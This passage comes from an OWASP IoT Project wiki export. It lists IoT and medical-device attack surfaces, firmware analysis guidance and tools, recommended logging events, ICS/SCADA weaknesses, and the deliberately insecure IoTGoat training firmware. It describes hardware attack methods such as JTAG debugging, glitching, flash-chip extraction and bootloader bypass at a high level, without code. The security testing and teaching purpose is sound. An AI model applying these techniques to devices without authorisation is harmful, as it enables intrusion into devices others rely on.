|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<br />
<br />
= IoTGoat =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoT Goat will be a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project]] <br />
<br />
To get more information on getting started visit the project's Github: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
* NodeGoat<br />
* RailsGoat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
[https://groups.google.com/forum/#!forum/iotgoat IoTGoat Google Group]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=250074OWASP Internet of Things Project2019-04-12T20:38:44Z<p>Aaron.guzman: /* GitBook */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
